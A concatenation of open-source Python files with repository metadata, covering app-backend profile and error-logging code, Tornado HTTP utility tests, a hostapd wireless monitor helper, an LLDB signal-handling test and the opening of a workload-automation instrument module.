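# stack traces that differ only in those details collapse onto the same key, so
# repeated occurrences of one crash are counted on a single ClientError entity.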
@arguments(request=LogErrorRequestTO, user=users.User, install_id=unicode, session=Session)
def _log_client_error(request, user, install_id, session):
key_name = get_error_key(request.platform, request.errorMessage, request.description)
error_key = ClientError.create_key(key_name)
# When too many collisions occur, consider a queue that can only execute 1 task/sec
@ndb.transactional()
def trans():
err = error_key.get()
if not err:
err = ClientError(key=error_key,
versions=[],
message=request.errorMessage,
description=request.description,
platform=request.platform)
for ver in err.versions:
if ver.platform_version == request.platformVersion and ver.client_version == request.mobicageVersion:
break
else:
err.versions.append(ErrorPlatformVersion(platform_version=request.platformVersion,
client_version=request.mobicageVersion))
err.count += 1
now_ = now()
ts = request.timestamp / 1000 if request.timestamp > now_ * 10 else request.timestamp
# don't accept timestamps in the future
if ts > now_:
ts = now_
if session and session.user != user:
if session.shop:
user_str = u'%s (%s via shop)' % (user, session.user)
else:
user_str = u'%s (%s)' % (user, session.user)
elif user:
user_str = u'%s' % user
else:
user_str = None
client_error = ClientErrorOccurrence(parent=error_key,
user=user.email() if user else None,
install_id=install_id,
occurred_date=datetime.utcfromtimestamp(ts),
user_str=user_str)
ndb.put_multi([err, client_error])
trans()
installation = Installation.get_by_key_name(install_id) if install_id else None
if installation:
InstallationLog(parent=installation, timestamp=now(), description=u'ClientError occurred').put()
@returns(NoneType)
@arguments(app_user=users.User, name=unicode, first_name=unicode, last_name=unicode, image=unicode, access_token=unicode,
birthdate=long, gender=long, has_birthdate=bool, has_gender=bool, current_mobile=Mobile)
def _edit_profile(app_user, name, first_name, last_name, image, access_token,
birthdate, gender, has_birthdate, has_gender, current_mobile):
from rogerthat.bizz.profile import update_avatar_profile, couple_facebook_id_with_profile, schedule_re_index
def trans(image):
changed_properties = []
user_profile = get_user_profile(app_user)
if first_name is not None and first_name is not MISSING and last_name is not None and last_name is not MISSING:
if user_profile.first_name != first_name:
changed_properties.append(u"first_name")
user_profile.first_name = first_name
if user_profile.last_name != last_name:
changed_properties.append(u"last_name")
user_profile.last_name = last_name
user_profile.name = u'%s %s' % (user_profile.first_name, user_profile.last_name)
elif name is not None and name is not MISSING:
if user_profile.name != name:
changed_properties.append(u"name")
user_profile.name = name
user_profile.first_name = None
user_profile.last_name = None
# has_birthdate and has_gender are used starting from 1.0.999.A and 1.0.137.i
if has_birthdate is not MISSING and has_gender is not MISSING:
if has_birthdate is True:
user_profile.birthdate = birthdate
user_profile.birth_day = UserProfile.get_birth_day_int(birthdate)
if has_gender is True:
user_profile.gender = gender
else:
# birthdate and gender are only used without has_gender and has_birthdate in 1.0.998.A
if birthdate is not MISSING and gender is not MISSING:
if birthdate == 0 and gender == 0:
pass # user pressed save in 1.0.998.A without setting gender and birthdate
else:
user_profile.birthdate = birthdate
user_profile.birth_day = UserProfile.get_birth_day_int(birthdate)
if gender != 0:
user_profile.gender = gender
if image:
avatar = get_avatar_by_id(user_profile.avatarId)
if not avatar:
avatar = Avatar(user=user_profile.user)
image = base64.b64decode(str(image))
img = Image(image)
if img.width > 150 or img.height > 150:
logging.info('Resizing avatar from %sx%s to 150x150', img.width, img.height)
img.resize(150, 150)
image = img.execute_transforms(img.format, 100)
update_avatar_profile(user_profile, avatar, image)
changed_properties.append(u"avatar")
user_profile.version += 1
user_profile.put()
from rogerthat.bizz.profile import update_mobiles, update_friends
update_mobiles(user_profile.user, user_profile, current_mobile) # update myIdentity
schedule_re_index(app_user)
if changed_properties: # Not necessary when only birth date or gender were updated.
update_friends(user_profile) # notify my friends.
xg_on = db.create_transaction_options(xg=True)
db.run_in_transaction_options(xg_on, trans, image)
if access_token:
couple_facebook_id_with_profile(app_user, access_token)
@returns(NoneType)
@arguments(app_user=users.User, name=unicode, first_name=unicode, last_name=unicode, image=unicode, access_token=unicode,
birthdate=long, gender=long, has_birthdate=bool, has_gender=bool, current_mobile=Mobile)
def edit_profile(app_user, name, first_name, last_name, image, access_token=None,
birthdate=MISSING, gender=MISSING, has_birthdate=MISSING, has_gender=MISSING, current_mobile=None):
try_or_defer(_edit_profile, app_user, name, first_name, last_name, image, access_token,
birthdate, gender, has_birthdate, has_gender, current_mobile, accept_missing=True)
@returns(bool)
@arguments(profile_info=(UserProfileInfo, NoneType))
def has_profile_addresses(profile_info):
    return bool(profile_info and profile_info.addresses)
@returns([ProfileAddressTO])
@arguments(app_user=users.User)
def get_profile_addresses(app_user):
return get_profile_addresses_to(UserProfileInfo.create_key(app_user).get())
@returns([ProfileAddressTO])
@arguments(user_profile_info=UserProfileInfo)
def get_profile_addresses_to(user_profile_info):
# type: (UserProfileInfo) -> list[ProfileAddressTO]
if not user_profile_info:
return []
return [ProfileAddressTO.from_model(address) for address in user_profile_info.addresses]
def _update_profile_address(app_user, request, is_update=False):
# type: (users.User, ProfileAddressTO, bool) -> UserProfileInfoAddress
app_id = get_app_id_from_app_user(app_user)
country_code = get_app_by_id(app_id).country
if not country_code:
raise Exception('No country code set for app %s' % app_id)
upi_key = UserProfileInfo.create_key(app_user)
profile_info = upi_key.get()
if not profile_info:
if is_update:
return None
profile_info = UserProfileInfo(key=upi_key)
address_uid = UserProfileInfoAddress.create_uid([country_code,
request.zip_code,
request.street_name,
request.house_nr,
request.bus_nr])
if is_update:
old_address = profile_info.get_address(request.uid)
if not old_address:
return None
should_update = request.uid == address_uid
else:
old_address = profile_info.get_address(address_uid)
        should_update = bool(old_address)
if should_update:
return _save_existing_address(profile_info, old_address, request)
if is_update:
profile_info.addresses.remove(old_address)
existing_address = profile_info.get_address(address_uid)
if existing_address:
return _save_existing_address(profile_info, existing_address, request)
street_uid = UserProfileInfoAddress.create_uid([country_code,
request.zip_code,
request.street_name])
address = UserProfileInfoAddress(created=datetime.now(),
address_uid=address_uid,
street_uid=street_uid,
label=request.label,
geo_location=ndb.GeoPt(request.geo_location.lat,
request.geo_location.lon),
distance=request.distance,
street_name=request.street_name,
house_nr=request.house_nr,
bus_nr=request.bus_nr,
zip_code=request.zip_code,
city=request.city,
type=request.type,
country_code=country_code)
profile_info.addresses.append(address)
profile_info.put()
after_profile_info_updated(profile_info)
return address
def _save_existing_address(profile_info, existing_address, request):
existing_address.label = request.label
existing_address.distance = request.distance
existing_address.type = request.type
profile_info.put()
after_profile_info_updated(profile_info)
return existing_address
@returns(UserProfileInfoAddress)
@arguments(app_user=users.User, request=AddProfileAddressRequestTO)
def add_profile_address(app_user, request):
return _update_profile_address(app_user, request)
@returns(UserProfileInfoAddress)
@arguments(app_user=users.User, request=UpdateProfileAddressRequestTO)
def update_profile_address(app_user, request):
return _update_profile_address(app_user, request, is_update=True)
@returns()
@arguments(app_user=users.User, address_uids=[unicode])
def delete_profile_addresses(app_user, address_uids):
upi = UserProfileInfo.create_key(app_user).get()
if not upi:
return
should_put = False
for a in reversed(upi.addresses):
if a.address_uid in address_uids:
should_put = True
upi.addresses.remove(a)
if should_put:
upi.put()
after_profile_info_updated(upi)
def after_profile_info_updated(profile):
# type: (UserProfileInfo) -> None
deferred.defer(_after_profile_info_updated, profile)
def _after_profile_info_updated(profile):
# type: (UserProfileInfo) -> None
from rogerthat.bizz.service import set_user_data_object
app_user = profile.app_user
user_profile = get_user_profile(app_user)
community = get_community(user_profile.community_id)
if CustomizationFeatures.HOME_ADDRESS_IN_USER_DATA in community.customization_features and community.main_service:
si_user = create_service_identity_user(community.main_service_user)
home_addresses = [p for p in profile.addresses if p.type == UserAddressType.HOME]
user_data = {'home_address': {'city': home_addresses[0].city} if home_addresses else None}
set_user_data_object(si_user, app_user, user_data)
@returns([ProfilePhoneNumberTO])
@arguments(app_user=users.User)
def get_profile_phone_numbers(app_user):
return get_profile_phone_numbers_to(UserProfileInfo.create_key(app_user).get())
@returns([ProfilePhoneNumberTO])
@arguments(user_profile_info=UserProfileInfo)
def get_profile_phone_numbers_to(user_profile_info):
# type: (UserProfileInfo) -> list[ProfilePhoneNumberTO]
if not user_profile_info or not user_profile_info.phone_numbers:
return []
return [ProfilePhoneNumberTO.from_model(m) for m in user_profile_info.phone_numbers]
def _update_profile_phone_number(app_user, request, is_update=False):
    # type: (users.User, ProfilePhoneNumberTO, bool) -> UserProfileInfoPhoneNumber
upi_key = UserProfileInfo.create_key(app_user)
profile_info = upi_key.get()
if not profile_info:
if is_update:
return None
profile_info = UserProfileInfo(key=upi_key)
phone_number = UserProfileInfoPhoneNumber(created=datetime.now(),
type=request.type,
label=request.label,
number=request.number)
phone_number_uid = phone_number.uid
if is_update:
old_phone_number = profile_info.get_phone_number(request.uid)
if not old_phone_number:
return None
if request.uid == phone_number_uid:
return _save_existing_phone_number(profile_info, old_phone_number, request)
else:
old_phone_number = profile_info.get_phone_number(phone_number_uid)
if old_phone_number:
return _save_existing_phone_number(profile_info, old_phone_number, request)
if is_update:
profile_info.phone_numbers.remove(old_phone_number)
existing_phone_number = profile_info.get_phone_number(phone_number_uid)
if existing_phone_number:
return _save_existing_phone_number(profile_info, existing_phone_number, request)
profile_info.phone_numbers.append(phone_number)
profile_info.put()
return phone_number
def _save_existing_phone_number(profile_info, existing_phone_number, request):
existing_phone_number.type = request.type
existing_phone_number.label = request.label
profile_info.put()
return existing_phone_number
@returns(UserProfileInfoPhoneNumber)
@arguments(app_user=users.User, request=AddProfilePhoneNumberRequestTO)
def add_profile_phone_number(app_user, request):
return _update_profile_phone_number(app_user, request)
@returns(UserProfileInfoPhoneNumber)
@arguments(app_user=users.User, request=UpdateProfilePhoneNumberRequestTO)
def update_profile_phone_number(app_user, request):
return _update_profile_phone_number(app_user, request, is_update=True)
@returns()
@arguments(app_user=users.User, uids=[unicode])
def delete_profile_phone_numbers(app_user, uids):
upi = UserProfileInfo.create_key(app_user).get()
if not upi:
return
should_put = False
for m in reversed(upi.phone_numbers):
if m.uid in uids:
should_put = True
upi.phone_numbers.remove(m)
if should_put:
upi.put()
@returns(CurrentlyForwardingLogs)
@arguments(app_user=users.User, xmpp_target_jid=unicode, mobile=Mobile, xmpp_target_password=unicode, type_=int)
def start_log_forwarding(app_user, xmpp_target_jid, mobile=None, xmpp_target_password=None,
type_=CurrentlyForwardingLogs.TYPE_XMPP):
def trans():
request = ForwardLogsRequestTO()
request.jid = unicode(xmpp_target_jid) if xmpp_target_jid else None
forwardLogs(forward_logs_response_handler, logError, app_user, request=request, MOBILE_ACCOUNT=mobile)
if request.jid:
clf = CurrentlyForwardingLogs(key=CurrentlyForwardingLogs.create_key(app_user),
xmpp_target=request.jid,
xmpp_target_password=xmpp_target_password,
type=type_)
clf.put()
return clf
else:
db.delete(CurrentlyForwardingLogs.create_key(app_user))
return None
if db.is_in_transaction:
return trans()
else:
xg_on = db.create_transaction_options(xg=True)
return db.run_in_transaction_options(xg_on, trans)
@returns(NoneType)
@arguments(app_user=users.User)
def stop_log_forwarding(app_user):
start_log_forwarding(app_user, None)
@returns([CurrentlyForwardingLogs])
@arguments()
def get_users_currently_forwarding_logs():
def trans():
return generator(CurrentlyForwardingLogs.all().ancestor(CurrentlyForwardingLogs.create_parent_key()))
return db.run_in_transaction(trans)
@returns()
@arguments(service_user=users.User, email=unicode, success=bool)
def delete_service_finished(service_user, email, success):
from rogerthat.service.api.system import service_deleted
service_deleted(system_service_deleted_response_handler, logServiceError, get_service_profile(service_user),
email=email, success=success)
@mapping('system.service_deleted.response_handler')
@returns(NoneType)
@arguments(context=ServiceAPICallback, result=NoneType)
def system_service_deleted_response_handler(context, result):
pass
@mapping('com.mobicage.capi.system.update_app_asset')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UpdateAppAssetResponseTO)
def update_app_asset_response(context, result):
pass
@mapping('com.mobicage.capi.system.update_embedded_app')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UpdateEmbeddedAppResponseTO)
def update_embedded_app_response(context, result):
pass
@mapping('com.mobicage.capi.system.update_embedded_apps')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UpdateEmbeddedAppsResponseTO)
def update_embedded_apps_response(context, result):
pass
|
our-city-app/oca-backend
|
src/rogerthat/bizz/system.py
|
Python
|
apache-2.0
| 40,307
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
from tornado.httputil import url_concat, parse_multipart_form_data, HTTPHeaders, format_timestamp, HTTPServerRequest
from tornado.escape import utf8
from tornado.log import gen_log
from tornado.testing import ExpectLog
from tornado.test.util import unittest
import datetime
import logging
import time
class TestUrlConcat(unittest.TestCase):
def test_url_concat_no_query_params(self):
url = url_concat(
"https://localhost/path",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?y=y&z=z")
def test_url_concat_encode_args(self):
url = url_concat(
"https://localhost/path",
[('y', '/y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?y=%2Fy&z=z")
def test_url_concat_trailing_q(self):
url = url_concat(
"https://localhost/path?",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?y=y&z=z")
def test_url_concat_q_with_no_trailing_amp(self):
url = url_concat(
"https://localhost/path?x",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?x&y=y&z=z")
def test_url_concat_trailing_amp(self):
url = url_concat(
"https://localhost/path?x&",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?x&y=y&z=z")
def test_url_concat_mult_params(self):
url = url_concat(
"https://localhost/path?a=1&b=2",
[('y', 'y'), ('z', 'z')],
)
self.assertEqual(url, "https://localhost/path?a=1&b=2&y=y&z=z")
def test_url_concat_no_params(self):
url = url_concat(
"https://localhost/path?r=1&t=2",
[],
)
self.assertEqual(url, "https://localhost/path?r=1&t=2")
class MultipartFormDataTest(unittest.TestCase):
def test_file_upload(self):
data = b"""\
--1234
Content-Disposition: form-data; name="files"; filename="ab.txt"
Foo
--1234--""".replace(b"\n", b"\r\n")
args = {}
files = {}
parse_multipart_form_data(b"1234", data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], "ab.txt")
self.assertEqual(file["body"], b"Foo")
def test_unquoted_names(self):
# quotes are optional unless special characters are present
data = b"""\
--1234
Content-Disposition: form-data; name=files; filename=ab.txt
Foo
--1234--""".replace(b"\n", b"\r\n")
args = {}
files = {}
parse_multipart_form_data(b"1234", data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], "ab.txt")
self.assertEqual(file["body"], b"Foo")
def test_special_filenames(self):
filenames = ['a;b.txt',
'a"b.txt',
'a";b.txt',
'a;"b.txt',
'a";";.txt',
'a\\"b.txt',
'a\\b.txt',
]
for filename in filenames:
logging.debug("trying filename %r", filename)
data = """\
--1234
Content-Disposition: form-data; name="files"; filename="%s"
Foo
--1234--""" % filename.replace('\\', '\\\\').replace('"', '\\"')
data = utf8(data.replace("\n", "\r\n"))
args = {}
files = {}
parse_multipart_form_data(b"1234", data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], filename)
self.assertEqual(file["body"], b"Foo")
def test_boundary_starts_and_ends_with_quotes(self):
data = b'''\
--1234
Content-Disposition: form-data; name="files"; filename="ab.txt"
Foo
--1234--'''.replace(b"\n", b"\r\n")
args = {}
files = {}
parse_multipart_form_data(b'"1234"', data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], "ab.txt")
self.assertEqual(file["body"], b"Foo")
def test_missing_headers(self):
data = b'''\
--1234
Foo
--1234--'''.replace(b"\n", b"\r\n")
args = {}
files = {}
with ExpectLog(gen_log, "multipart/form-data missing headers"):
parse_multipart_form_data(b"1234", data, args, files)
self.assertEqual(files, {})
def test_invalid_content_disposition(self):
data = b'''\
--1234
Content-Disposition: invalid; name="files"; filename="ab.txt"
Foo
--1234--'''.replace(b"\n", b"\r\n")
args = {}
files = {}
with ExpectLog(gen_log, "Invalid multipart/form-data"):
parse_multipart_form_data(b"1234", data, args, files)
self.assertEqual(files, {})
def test_line_does_not_end_with_correct_line_break(self):
data = b'''\
--1234
Content-Disposition: form-data; name="files"; filename="ab.txt"
Foo--1234--'''.replace(b"\n", b"\r\n")
args = {}
files = {}
with ExpectLog(gen_log, "Invalid multipart/form-data"):
parse_multipart_form_data(b"1234", data, args, files)
self.assertEqual(files, {})
def test_content_disposition_header_without_name_parameter(self):
data = b"""\
--1234
Content-Disposition: form-data; filename="ab.txt"
Foo
--1234--""".replace(b"\n", b"\r\n")
args = {}
files = {}
with ExpectLog(gen_log, "multipart/form-data value missing name"):
parse_multipart_form_data(b"1234", data, args, files)
self.assertEqual(files, {})
def test_data_after_final_boundary(self):
# The spec requires that data after the final boundary be ignored.
# http://www.w3.org/Protocols/rfc1341/7_2_Multipart.html
# In practice, some libraries include an extra CRLF after the boundary.
data = b"""\
--1234
Content-Disposition: form-data; name="files"; filename="ab.txt"
Foo
--1234--
""".replace(b"\n", b"\r\n")
args = {}
files = {}
parse_multipart_form_data(b"1234", data, args, files)
file = files["files"][0]
self.assertEqual(file["filename"], "ab.txt")
self.assertEqual(file["body"], b"Foo")
class HTTPHeadersTest(unittest.TestCase):
def test_multi_line(self):
# Lines beginning with whitespace are appended to the previous line
# with any leading whitespace replaced by a single space.
# Note that while multi-line headers are a part of the HTTP spec,
# their use is strongly discouraged.
data = """\
Foo: bar
baz
Asdf: qwer
\tzxcv
Foo: even
more
lines
""".replace("\n", "\r\n")
headers = HTTPHeaders.parse(data)
self.assertEqual(headers["asdf"], "qwer zxcv")
self.assertEqual(headers.get_list("asdf"), ["qwer zxcv"])
self.assertEqual(headers["Foo"], "bar baz,even more lines")
self.assertEqual(headers.get_list("foo"), ["bar baz", "even more lines"])
self.assertEqual(sorted(list(headers.get_all())),
[("Asdf", "qwer zxcv"),
("Foo", "bar baz"),
("Foo", "even more lines")])
class FormatTimestampTest(unittest.TestCase):
# Make sure that all the input types are supported.
TIMESTAMP = 1359312200.503611
EXPECTED = 'Sun, 27 Jan 2013 18:43:20 GMT'
def check(self, value):
self.assertEqual(format_timestamp(value), self.EXPECTED)
def test_unix_time_float(self):
self.check(self.TIMESTAMP)
def test_unix_time_int(self):
self.check(int(self.TIMESTAMP))
def test_struct_time(self):
self.check(time.gmtime(self.TIMESTAMP))
def test_time_tuple(self):
tup = tuple(time.gmtime(self.TIMESTAMP))
self.assertEqual(9, len(tup))
self.check(tup)
def test_datetime(self):
self.check(datetime.datetime.utcfromtimestamp(self.TIMESTAMP))
# HTTPServerRequest is mainly tested incidentally to the server itself,
# but this tests the parts of the class that can be tested in isolation.
class HTTPServerRequestTest(unittest.TestCase):
def test_default_constructor(self):
# All parameters are formally optional, but uri is required
# (and has been for some time). This test ensures that no
# more required parameters slip in.
HTTPServerRequest(uri='/')
|
leekchan/tornado_test
|
tornado/test/httputil_test.py
|
Python
|
apache-2.0
| 8,511
|
# coding: utf-8
# pylint: disable=wildcard-import
"""
Provides logic for non API urls
"""
#from .error import *
#from .index import *
#from .user import *
|
chdb/DhammaMap1
|
main/control/__init__.py
|
Python
|
mit
| 157
|
# Monitor support
# Copyright (c) 2016, Tieto Corporation
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import time
from remotehost import Host
import config
import rutils
import re
import traceback
import logging
logger = logging.getLogger()
import hostapd
# standalone monitor with multi iface support
def create(devices, setup_params, refs, duts, monitors):
mons = []
mhosts = []
hosts = duts + refs
# choose only standalone monitors
for monitor in monitors:
if monitor not in hosts and monitor != "all":
mons.append(monitor)
for mon in mons:
dev = config.get_device(devices, mon)
if dev is None:
continue
host = Host(host=dev['hostname'],
ifname=dev['ifname'],
port=dev['port'],
name=dev['name'])
try:
host.execute(["iw", "reg", "set", setup_params['country']])
rutils.setup_hw_host(host, setup_params, True)
except:
pass
mhosts.append(host)
return mhosts
def destroy(devices, hosts):
for host in hosts:
stop(host)
for monitor in host.monitors:
host.execute(["ifconfig", monitor, "down"])
def setup(host, monitor_params):
if host is None:
return
ifaces = re.split('; | |, ', host.ifname)
count = 0
for param in monitor_params:
try:
iface = ifaces[count]
except:
logger.debug(traceback.format_exc())
break
host.execute(["ifconfig", iface, " down"])
host.execute(["iw", iface, "set type monitor"])
host.execute(["ifconfig", iface, "up"])
status, buf = host.execute(["iw", iface, "set", "freq", param['freq'],
param['bw'], param['center_freq1'],
param['center_freq2']])
if status != 0:
logger.debug("Could not setup monitor interface: " + buf)
continue
host.monitors.append(iface)
count = count + 1
def run(host, setup_params):
monitor_res = []
log_monitor = ""
if host is None:
return None
if len(host.monitors) == 0:
return None
try:
log_dir = setup_params['log_dir']
tc_name = setup_params['tc_name']
except:
return None
tshark = "tshark"
for monitor in host.monitors:
host.execute(["ifconfig", monitor, "up"])
tshark = tshark + " -i " + monitor
log_monitor = log_monitor + "_" + monitor
log = log_dir + tc_name + "_" + host.name + log_monitor + ".pcap"
host.add_log(log)
thread = host.execute_run([tshark, "-w", log], monitor_res)
host.thread = thread
def stop(host):
if host is None:
return
if len(host.monitors) == 0:
return
if host.thread is None:
return
host.execute(["killall", "-s", "INT", "tshark"])
host.wait_execute_complete(host.thread, 5)
if host.thread.isAlive():
raise Exception("tshark still alive")
host.thread = None
# Add monitor to existing interface
def add(host, monitors):
if host is None:
return
for monitor in monitors:
if monitor != "all" and monitor != host.name:
continue
mon = "mon_" + host.ifname
status, buf = host.execute(["iw", host.ifname, "interface", "add", mon,
"type", "monitor"])
if status == 0:
host.monitors.append(mon)
host.execute(["ifconfig", mon, "up"])
else:
logger.debug("Could not add monitor for " + host.name)
def remove(host):
stop(host)
for monitor in host.monitors:
host.execute(["iw", monitor, "del"])
host.monitors.remove(monitor)
# get monitor params from hostapd/wpa_supplicant
def get_monitor_params(wpa, is_p2p=False):
if is_p2p:
get_status_field_f = wpa.get_group_status_field
else:
get_status_field_f = wpa.get_status_field
freq = get_status_field_f("freq")
bw = "20"
center_freq1 = ""
center_freq2 = ""
vht_oper_chwidth = get_status_field_f("vht_oper_chwidth")
secondary_channel = get_status_field_f("secondary_channel")
vht_oper_centr_freq_seg0_idx = get_status_field_f("vht_oper_centr_freq_seg0_idx")
vht_oper_centr_freq_seg1_idx = get_status_field_f("vht_oper_centr_freq_seg1_idx")
if vht_oper_chwidth == "0" or vht_oper_chwidth is None:
if secondary_channel == "1":
bw = "40"
center_freq1 = str(int(freq) + 10)
        elif secondary_channel == "-1":
            bw = "40"
            center_freq1 = str(int(freq) - 10)
else:
pass
elif vht_oper_chwidth == "1":
bw = "80"
center_freq1 = str(int(vht_oper_centr_freq_seg0_idx) * 5 + 5000)
elif vht_oper_chwidth == "2":
bw = "160"
center_freq1 = str(int(vht_oper_centr_freq_seg0_idx) * 5 + 5000)
elif vht_oper_chwidth == "3":
bw = "80+80"
center_freq1 = str(int(vht_oper_centr_freq_seg0_idx) * 5 + 5000)
center_freq2 = str(int(vht_oper_centr_freq_seg1_idx) * 5 + 5000)
else:
pass
monitor_params = {"freq" : freq,
"bw" : bw,
"center_freq1" : center_freq1,
"center_freq2" : center_freq2}
return monitor_params
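# Worked example of the arithmetic above (hypothetical status values): for an
# 80 MHz VHT BSS with vht_oper_chwidth == "1" and
# vht_oper_centr_freq_seg0_idx == "42", center_freq1 = 42 * 5 + 5000 = 5210,
# so setup() would end up running: iw <iface> set freq <freq> 80 5210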
|
s0lst1c3/eaphammer
|
local/hostapd-eaphammer/tests/remote/monitor.py
|
Python
|
gpl-3.0
| 5,448
|
"""Test that we handle inferiors that send signals to themselves"""
from __future__ import print_function
import lldb
import re
from lldbsuite.test.lldbplatformutil import getDarwinOSTriples
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
@skipIfWindows # signals do not exist on Windows
class RaiseTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
NO_DEBUG_INFO_TESTCASE = True
@skipIfNetBSD # Hangs on NetBSD
def test_sigstop(self):
self.build()
self.signal_test('SIGSTOP', False)
# passing of SIGSTOP is not correctly handled, so not testing that
# scenario: https://llvm.org/bugs/show_bug.cgi?id=23574
@skipIfDarwin # darwin does not support real time signals
@skipIfTargetAndroid()
def test_sigsigrtmin(self):
self.build()
self.signal_test('SIGRTMIN', True)
@skipIfNetBSD # Hangs on NetBSD
def test_sigtrap(self):
self.build()
self.signal_test('SIGTRAP', True)
def launch(self, target, signal):
# launch the process, do not stop at entry point.
process = target.LaunchSimple(
[signal], None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
self.assertEqual(process.GetState(), lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(
process, lldb.eStopReasonBreakpoint)
self.assertTrue(
thread.IsValid(),
"Thread should be stopped due to a breakpoint")
return process
def set_handle(self, signal, pass_signal, stop_at_signal, notify_signal):
return_obj = lldb.SBCommandReturnObject()
self.dbg.GetCommandInterpreter().HandleCommand(
"process handle %s -p %s -s %s -n %s" %
(signal, pass_signal, stop_at_signal, notify_signal), return_obj)
self.assertTrue(
return_obj.Succeeded(),
"Setting signal handling failed")
def signal_test(self, signal, test_passing):
"""Test that we handle inferior raising signals"""
exe = self.getBuildArtifact("a.out")
# Create a target by the debugger.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
lldbutil.run_break_set_by_symbol(self, "main")
# launch
process = self.launch(target, signal)
signo = process.GetUnixSignals().GetSignalNumberFromName(signal)
# retrieve default signal disposition
return_obj = lldb.SBCommandReturnObject()
self.dbg.GetCommandInterpreter().HandleCommand(
"process handle %s " % signal, return_obj)
match = re.match(
'NAME *PASS *STOP *NOTIFY.*(false|true) *(false|true) *(false|true)',
return_obj.GetOutput(),
re.IGNORECASE | re.DOTALL)
if not match:
self.fail('Unable to retrieve default signal disposition.')
default_pass = match.group(1)
default_stop = match.group(2)
default_notify = match.group(3)
# Make sure we stop at the signal
self.set_handle(signal, "false", "true", "true")
process.Continue()
self.assertEqual(process.GetState(), lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonSignal)
self.assertTrue(
thread.IsValid(),
"Thread should be stopped due to a signal")
self.assertTrue(
thread.GetStopReasonDataCount() >= 1,
"There was data in the event.")
self.assertEqual(thread.GetStopReasonDataAtIndex(0), signo,
"The stop signal was %s" % signal)
# Continue until we exit.
process.Continue()
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), 0)
# launch again
process = self.launch(target, signal)
# Make sure we do not stop at the signal. We should still get the
# notification.
self.set_handle(signal, "false", "false", "true")
self.expect(
"process continue",
substrs=[
"stopped and restarted",
signal])
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), 0)
# launch again
process = self.launch(target, signal)
# Make sure we do not stop at the signal, and we do not get the
# notification.
self.set_handle(signal, "false", "false", "false")
self.expect(
"process continue",
substrs=["stopped and restarted"],
matching=False)
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), 0)
if not test_passing:
# reset signal handling to default
self.set_handle(signal, default_pass, default_stop, default_notify)
return
# launch again
process = self.launch(target, signal)
# Make sure we stop at the signal
self.set_handle(signal, "true", "true", "true")
process.Continue()
self.assertEqual(process.GetState(), lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(process, lldb.eStopReasonSignal)
self.assertTrue(
thread.IsValid(),
"Thread should be stopped due to a signal")
self.assertTrue(
thread.GetStopReasonDataCount() >= 1,
"There was data in the event.")
self.assertEqual(
thread.GetStopReasonDataAtIndex(0),
process.GetUnixSignals().GetSignalNumberFromName(signal),
"The stop signal was %s" %
signal)
# Continue until we exit. The process should receive the signal.
process.Continue()
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), signo)
# launch again
process = self.launch(target, signal)
# Make sure we do not stop at the signal. We should still get the notification. Process
# should receive the signal.
self.set_handle(signal, "true", "false", "true")
self.expect(
"process continue",
substrs=[
"stopped and restarted",
signal])
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), signo)
# launch again
process = self.launch(target, signal)
# Make sure we do not stop at the signal, and we do not get the notification. Process
# should receive the signal.
self.set_handle(signal, "true", "false", "false")
self.expect(
"process continue",
substrs=["stopped and restarted"],
matching=False)
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), signo)
# reset signal handling to default
self.set_handle(signal, default_pass, default_stop, default_notify)
|
apple/swift-lldb
|
packages/Python/lldbsuite/test/functionalities/signal/raise/TestRaise.py
|
Python
|
apache-2.0
| 7,195
|
# Copyright 2013-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pylint: disable=W0613,no-member,attribute-defined-outside-init
"""
Some "standard" instruments to collect additional info about workload execution.
.. note:: The run() method of a Workload may perform some "boilerplate" as well as
the actual execution of the workload (e.g. it may contain UI automation
needed to start the workload). This "boilerplate" execution will also
          be measured by these instruments. As such, they are not suitable for collecting
          precise data about specific operations.
"""
import os
import re
import logging
import time
import tarfile
from itertools import izip, izip_longest
from subprocess import CalledProcessError
from wlauto import Instrument, Parameter
from wlauto.core import signal
from wlauto.exceptions import DeviceError, ConfigError
from wlauto.utils.misc import diff_tokens, write_table, check_output, as_relative
from wlauto.utils.misc import ensure_file_directory_exists as _f
from wlauto.utils.misc import ensure_directory_exists as _d
from wlauto.utils.android import ApkInfo
from wlauto.utils.types import list_of_strings
logger = logging.getLogger(__name__)
class SysfsExtractor(Instrument):
name = 'sysfs_extractor'
description = """
    Collects the contents of a set of directories, before and after workload execution
and diffs the result.
"""
